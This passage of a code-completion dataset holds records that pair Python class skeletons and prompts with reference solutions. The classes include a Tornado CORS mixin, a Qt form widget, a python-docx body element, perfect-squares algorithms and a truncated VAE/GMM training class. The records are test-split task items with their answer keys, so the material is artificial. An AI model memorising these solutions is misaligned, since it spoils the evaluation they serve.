"the_stack_v2_python_sparse", "source_path": "Api/Release/Handler/ReadyReleaseHandler.py", "source_repo": "liuwei881/OpenPlatform", "split": "test", "star_events_count": 1} {"blob_id": "1a40a185be9faa62d8993704205fc718adb50486", "bodies": ["if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\nif self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)", "if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\nif self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\nelse:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\nif self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\nif self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\nif self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\nself.set_status(204)\nself.finish()", "supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\nmethods = []\nfor meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\nreturn ', '.join(methods)"], "bodies_text": "<|body_start_0|>\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n<|end_body_1|>\n\n<|body_start_2|>\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "CorsMixin", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CorsMixin:\n\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n <|body_0|>\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n <|body_1|>\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n<|end_body_1|>\n\n<|body_start_2|>\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000305", "length_bytes": 2506, "license_type": "permissive", "methods": [{"docstring": "设置默认头", "name": "set_default_headers", "signature": "def set_default_headers(self)"}, {"docstring": "写入跨域请求header", "name": "options", "signature": "def options(self, *args, **kwargs)"}, {"docstring": "设置支持的跨域方法", "name": "_get_methods", "signature": "def _get_methods(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007167", "prompt": "Implement the Python class `CorsMixin` described below.\n\nClass description:\nImplement the CorsMixin class.\n\nMethod signatures and docstrings:\n- def set_default_headers(self): 设置默认头\n- def options(self, *args, **kwargs): 写入跨域请求header\n- def _get_methods(self): 设置支持的跨域方法", "prompted_full_text": "Implement the Python class `CorsMixin` described below.\n\nClass description:\nImplement the CorsMixin class.\n\nMethod signatures and docstrings:\n- def set_default_headers(self): 设置默认头\n- def options(self, *args, **kwargs): 写入跨域请求header\n- def _get_methods(self): 设置支持的跨域方法\n\n<|skeleton|>\nclass CorsMixin:\n\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n <|body_0|>\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n <|body_1|>\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n<|end_body_1|>\n\n<|body_start_2|>\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n<|end_body_2|>\n", "revision_id": "9999d70429d9f773501f9a11910997343ff2df93", "skeleton": "<|skeleton|>\nclass CorsMixin:\n\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n <|body_0|>\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n <|body_1|>\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CorsMixin:\n def set_default_headers(self):\n \"\"\"设置默认头\"\"\"\n if self.CORS_ORIGIN:\n self.set_header('Access-Control-Allow-Origin', self.CORS_ORIGIN)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n\n def options(self, *args, **kwargs):\n \"\"\"写入跨域请求header\"\"\"\n if self.CORS_HEADERS:\n self.set_header('Access-Control-Allow-Headers', self.CORS_HEADERS)\n if self.CORS_METHODS:\n self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)\n else:\n self.set_header('Access-Control-Allow-Methods', self._get_methods())\n if self.CORS_CREDENTIALS != None:\n self.set_header('Access-Control-Allow-Credentials', 'true' if self.CORS_CREDENTIALS else 'false')\n if self.CORS_MAX_AGE:\n self.set_header('Access-Control-Max-Age', self.CORS_MAX_AGE)\n if self.CORS_EXPOSE_HEADERS:\n self.set_header('Access-Control-Expose-Headers', self.CORS_EXPOSE_HEADERS)\n self.set_status(204)\n self.finish()\n\n def _get_methods(self):\n \"\"\"设置支持的跨域方法\"\"\"\n supported_methods = [method.lower() for method in self.SUPPORTED_METHODS]\n methods = []\n for meth in supported_methods:\n instance_meth = getattr(self, meth)\n if not meth:\n continue\n handler_class = _get_class_that_defined_method(instance_meth)\n if not handler_class is RequestHandler:\n methods.append(meth.upper())\n return ', '.join(methods)\n", "source": "the_stack_v2_python_sparse", "source_path": "api/common/helpers/tornado_cors.py", "source_repo": "bopopescu/smp", "split": "test", "star_events_count": 0} {"blob_id": "ef651b320319ae1796350323b512628639ff77ae", "bodies": ["super().__init__()\nself.item = item\nself.inputs = []\nself.input_changed = self._get_input_changed_func(main_window)\nhbox = QHBoxLayout()\nself.setLayout(hbox)\nhbox.setSpacing(0)\nrows = 5\nfor i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\ntry:\n vbox.addStretch()\nexcept NameError:\n pass\nhbox.addStretch(100)", "def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\nreturn input_changed"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n<|end_body_0|>\n\n<|body_start_1|>\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n<|end_body_1|>\n", "class_docstring": "Frame represents attributes of a single item. Contains form layouts - labels and inputs", "class_name": "AttributesFrame", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AttributesFrame:\n \"\"\"Frame represents attributes of a single item. Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n <|body_0|>\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n<|end_body_0|>\n\n<|body_start_1|>\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000306", "length_bytes": 1723, "license_type": "no_license", "methods": [{"docstring": "main_window: MainWindow instance item: CalculableObject instance", "name": "__init__", "signature": "def __init__(self, main_window, item)"}, {"docstring": "I don't want to keep reference to the MainWindow", "name": "_get_input_changed_func", "signature": "def _get_input_changed_func(self, main_window)"}], "n_methods": 2, "prompt": "Implement the Python class `AttributesFrame` described below.\n\nClass description:\nFrame represents attributes of a single item. Contains form layouts - labels and inputs\n\nMethod signatures and docstrings:\n- def __init__(self, main_window, item): main_window: MainWindow instance item: CalculableObject instance\n- def _get_input_changed_func(self, main_window): I don't want to keep reference to the MainWindow", "prompted_full_text": "Implement the Python class `AttributesFrame` described below.\n\nClass description:\nFrame represents attributes of a single item. Contains form layouts - labels and inputs\n\nMethod signatures and docstrings:\n- def __init__(self, main_window, item): main_window: MainWindow instance item: CalculableObject instance\n- def _get_input_changed_func(self, main_window): I don't want to keep reference to the MainWindow\n\n<|skeleton|>\nclass AttributesFrame:\n \"\"\"Frame represents attributes of a single item. Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n <|body_0|>\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n<|end_body_0|>\n\n<|body_start_1|>\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n<|end_body_1|>\n", "revision_id": "606e188e88ee3a2b2e1daee60c71948c678228e1", "skeleton": "<|skeleton|>\nclass AttributesFrame:\n \"\"\"Frame represents attributes of a single item. Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n <|body_0|>\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AttributesFrame:\n \"\"\"Frame represents attributes of a single item. Contains form layouts - labels and inputs\"\"\"\n\n def __init__(self, main_window, item):\n \"\"\"main_window: MainWindow instance item: CalculableObject instance\"\"\"\n super().__init__()\n self.item = item\n self.inputs = []\n self.input_changed = self._get_input_changed_func(main_window)\n hbox = QHBoxLayout()\n self.setLayout(hbox)\n hbox.setSpacing(0)\n rows = 5\n for i, arg_name in enumerate(item):\n if i % rows == 0:\n try:\n vbox.addStretch(10)\n except NameError:\n pass\n vbox = QVBoxLayout()\n vbox.setSpacing(0)\n vbox.setContentsMargins(0, 0, 0, 0)\n hbox.addLayout(vbox)\n self.inputs.append(InputWidget(self, main_window, arg_name))\n vbox.addWidget(self.inputs[-1])\n try:\n vbox.addStretch()\n except NameError:\n pass\n hbox.addStretch(100)\n\n def _get_input_changed_func(self, main_window):\n \"\"\"I don't want to keep reference to the MainWindow\"\"\"\n def input_changed(label, value):\n self.item.set(label, value)\n self.item.calculate()\n for each in self.inputs:\n if label != each.label_text:\n each.set_value(self.item[each.label_text])\n main_window.input_changed(self.item)\n return input_changed\n", "source": "the_stack_v2_python_sparse", "source_path": "Hospital-Helper-2-master/app/gui/attributes_frame.py", "source_repo": "JoaoBueno/estudos-python", "split": "test", "star_events_count": 2} {"blob_id": "962c4b48dd3108cc4e27acba5fc8af2cb7a8fd11", "bodies": ["sentinel_sectPr = self.get_or_add_sectPr()\ncloned_sectPr = sentinel_sectPr.clone()\np = self.add_p()\np.set_sectPr(cloned_sectPr)\nreturn sentinel_sectPr", "if self.sectPr is not None:\n content_elms = self[:-1]\nelse:\n content_elms = self[:]\nfor content_elm in content_elms:\n self.remove(content_elm)"], "bodies_text": "<|body_start_0|>\n sentinel_sectPr = self.get_or_add_sectPr()\n cloned_sectPr = sentinel_sectPr.clone()\n p = self.add_p()\n p.set_sectPr(cloned_sectPr)\n return sentinel_sectPr\n<|end_body_0|>\n\n<|body_start_1|>\n if self.sectPr is not None:\n content_elms = self[:-1]\n else:\n content_elms = self[:]\n for content_elm in content_elms:\n self.remove(content_elm)\n<|end_body_1|>\n", "class_docstring": "````, the container element for the main document story in ``document.xml``.", "class_name": "CT_Body", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CT_Body:\n \"\"\"````, the container element for the main document story in ``document.xml``.\"\"\"\n\n def add_section_break(self):\n \"\"\"Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n <|body_0|>\n\n def clear_content(self):\n \"\"\"Remove all content child elements from this element. Leave the element if it is present.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sentinel_sectPr = self.get_or_add_sectPr()\n cloned_sectPr = sentinel_sectPr.clone()\n p = self.add_p()\n p.set_sectPr(cloned_sectPr)\n return sentinel_sectPr\n<|end_body_0|>\n\n<|body_start_1|>\n if self.sectPr is not None:\n content_elms = self[:-1]\n else:\n content_elms = self[:]\n for content_elm in content_elms:\n self.remove(content_elm)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000307", "length_bytes": 1810, "license_type": "permissive", "methods": [{"docstring": "Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.", "name": "add_section_break", "signature": "def add_section_break(self)"}, {"docstring": "Remove all content child elements from this element. Leave the element if it is present.", "name": "clear_content", "signature": "def clear_content(self)"}], "n_methods": 2, "prompt": "Implement the Python class `CT_Body` described below.\n\nClass description:\n````, the container element for the main document story in ``document.xml``.\n\nMethod signatures and docstrings:\n- def add_section_break(self): Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\n- def clear_content(self): Remove all content child elements from this element. Leave the element if it is present.", "prompted_full_text": "Implement the Python class `CT_Body` described below.\n\nClass description:\n````, the container element for the main document story in ``document.xml``.\n\nMethod signatures and docstrings:\n- def add_section_break(self): Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\n- def clear_content(self): Remove all content child elements from this element. Leave the element if it is present.\n\n<|skeleton|>\nclass CT_Body:\n \"\"\"````, the container element for the main document story in ``document.xml``.\"\"\"\n\n def add_section_break(self):\n \"\"\"Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n <|body_0|>\n\n def clear_content(self):\n \"\"\"Remove all content child elements from this element. Leave the element if it is present.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n sentinel_sectPr = self.get_or_add_sectPr()\n cloned_sectPr = sentinel_sectPr.clone()\n p = self.add_p()\n p.set_sectPr(cloned_sectPr)\n return sentinel_sectPr\n<|end_body_0|>\n\n<|body_start_1|>\n if self.sectPr is not None:\n content_elms = self[:-1]\n else:\n content_elms = self[:]\n for content_elm in content_elms:\n self.remove(content_elm)\n<|end_body_1|>\n", "revision_id": "cabf6e4f1970dc14302f87414f170de19944bac2", "skeleton": "<|skeleton|>\nclass CT_Body:\n \"\"\"````, the container element for the main document story in ``document.xml``.\"\"\"\n\n def add_section_break(self):\n \"\"\"Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n <|body_0|>\n\n def clear_content(self):\n \"\"\"Remove all content child elements from this element. Leave the element if it is present.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CT_Body:\n \"\"\"````, the container element for the main document story in ``document.xml``.\"\"\"\n\n def add_section_break(self):\n \"\"\"Return the current ```` element after adding a clone of it in a new ```` element appended to the block content elements. Note that the \"current\" ```` will always be the sentinel sectPr in this case since we're always working at the end of the block content.\"\"\"\n sentinel_sectPr = self.get_or_add_sectPr()\n cloned_sectPr = sentinel_sectPr.clone()\n p = self.add_p()\n p.set_sectPr(cloned_sectPr)\n return sentinel_sectPr\n\n def clear_content(self):\n \"\"\"Remove all content child elements from this element. Leave the element if it is present.\"\"\"\n if self.sectPr is not None:\n content_elms = self[:-1]\n else:\n content_elms = self[:]\n for content_elm in content_elms:\n self.remove(content_elm)\n", "source": "the_stack_v2_python_sparse", "source_path": "Pdf_docx_pptx_xlsx_epub_png/source/docx/oxml/document.py", "source_repo": "ryfeus/lambda-packs", "split": "test", "star_events_count": 1283} {"blob_id": "b0dfb261cd8e38c1bdaab216c55b49593deca1d5", "bodies": ["if n < 4:\n return n\ncounts = list(range(n + 1))\nfor i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\nreturn counts[n]", "if n < 4:\n return n\nsqrt_n = int(math.sqrt(n))\nif n == sqrt_n ** 2:\n return 1\nwhile n % 4 == 0:\n n //= 4\nif n % 8 == 7:\n return 4\nsqrt_n = int(math.sqrt(n))\nfor i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\nreturn 3"], "bodies_text": "<|body_start_0|>\n if n < 4:\n return n\n counts = list(range(n + 1))\n for i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\n return counts[n]\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 4:\n return n\n sqrt_n = int(math.sqrt(n))\n if n == sqrt_n ** 2:\n return 1\n while n % 4 == 0:\n n //= 4\n if n % 8 == 7:\n return 4\n sqrt_n = int(math.sqrt(n))\n for i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\n return 3\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 4:\n return n\n counts = list(range(n + 1))\n for i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\n return counts[n]\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 4:\n return n\n sqrt_n = int(math.sqrt(n))\n if n == sqrt_n ** 2:\n return 1\n while n % 4 == 0:\n n //= 4\n if n % 8 == 7:\n return 4\n sqrt_n = int(math.sqrt(n))\n for i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\n return 3\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000308", "length_bytes": 2068, "license_type": "no_license", "methods": [{"docstring": ":type n: int :rtype: int", "name": "numSquares_DP", "signature": "def numSquares_DP(self, n)"}, {"docstring": ":type n: int :rtype: int", "name": "numSquares_Math", "signature": "def numSquares_Math(self, n)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007361", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numSquares_DP(self, n): :type n: int :rtype: int\n- def numSquares_Math(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numSquares_DP(self, n): :type n: int :rtype: int\n- def numSquares_Math(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if n < 4:\n return n\n counts = list(range(n + 1))\n for i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\n return counts[n]\n<|end_body_0|>\n\n<|body_start_1|>\n if n < 4:\n return n\n sqrt_n = int(math.sqrt(n))\n if n == sqrt_n ** 2:\n return 1\n while n % 4 == 0:\n n //= 4\n if n % 8 == 7:\n return 4\n sqrt_n = int(math.sqrt(n))\n for i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\n return 3\n<|end_body_1|>\n", "revision_id": "e07b85a4121f2665393f1176befbdbe06f1e1ad0", "skeleton": "<|skeleton|>\nclass Solution:\n\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def numSquares_DP(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 4:\n return n\n counts = list(range(n + 1))\n for i in range(n):\n j = 1\n while True:\n temp = i + j * j\n if temp > n:\n break\n if counts[temp] > counts[i] + 1:\n counts[temp] = counts[i] + 1\n j += 1\n return counts[n]\n\n def numSquares_Math(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n if n < 4:\n return n\n sqrt_n = int(math.sqrt(n))\n if n == sqrt_n ** 2:\n return 1\n while n % 4 == 0:\n n //= 4\n if n % 8 == 7:\n return 4\n sqrt_n = int(math.sqrt(n))\n for i in range(1, sqrt_n + 1):\n nii = n - i ** 2\n sqrt_nii = int(math.sqrt(nii))\n if nii == sqrt_nii ** 2:\n return 2\n return 3\n", "source": "the_stack_v2_python_sparse", "source_path": "Algorithms/perfect-squares.py", "source_repo": "feilniu/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "ce2d9685bfb3e088b13c668bd9dda946cd9539eb", "bodies": ["self.vae = vae\nself.vgmm = vgmm\nself.hps = hps\nself.utils = utils\nself.is_chief = is_chief\nself.gamma_steps = resolve_simple_number(hps, 'gammaSteps')\nself.gmm_steps = resolve_simple_number(hps, 'gmmSteps')\nself.gamma_gmm_training_steps = self.gamma_steps + self.gmm_steps\nself.beta_steps = resolve_simple_number(hps, 'betaSteps')\nself.static_steps = resolve_simple_number(hps, 'staticSteps')\nself.svdc_gmm_finetune_steps = self.beta_steps + self.static_steps\nself.max_steps = resolve_simple_number(hps, 'maxSteps')\nself.mu = tf.placeholder(dtype=tf.float32)\nself.sigma = tf.placeholder(dtype=tf.float32)\nself.mtm = tf.pow(1.0 - self.vgmm['anneal_factor'], 3)\nself.update_svdc_with_gmm_ops = [tf.assign(self.vgmm['sigma'], (1.0 - self.mtm) * self.vgmm['sigma'] + self.mtm * self.sigma)]\nself.update_svdc_with_kmeans_ops = [tf.assign(self.vgmm['mu'], (1.0 - self.mtm) * self.vgmm['mu'] + self.mtm * self.mu)]\nself.gmm_data = None", "is_final = True if step == 0 else False\ngmm_input_slice = session.run(self.vae['z_mu'])\nif self.gmm_data is None:\n self.gmm_data = gmm_input_slice\nelse:\n self.gmm_data = np.concatenate([self.gmm_data, gmm_input_slice], axis=0)\ntfl.info('GMM data accumulation done at local step {} with {} samples.'.format(step, len(self.gmm_data)))\nif is_final:\n np.random.shuffle(self.gmm_data)\n kmeans = cluster.KMeans(n_clusters=self.hps.numCluster, random_state=0)\n kmeans.fit(self.gmm_data)\n session.run(self.update_svdc_with_kmeans_ops, feed_dict={self.mu: kmeans.cluster_centers_.T})\n skgmm = mixture.GaussianMixture(n_components=self.hps.numCluster, covariance_type='diag', max_iter=10000, means_init=kmeans.cluster_centers_, random_state=100)\n skgmm.fit(self.gmm_data)\n session.run(self.update_svdc_with_gmm_ops, feed_dict={self.sigma: 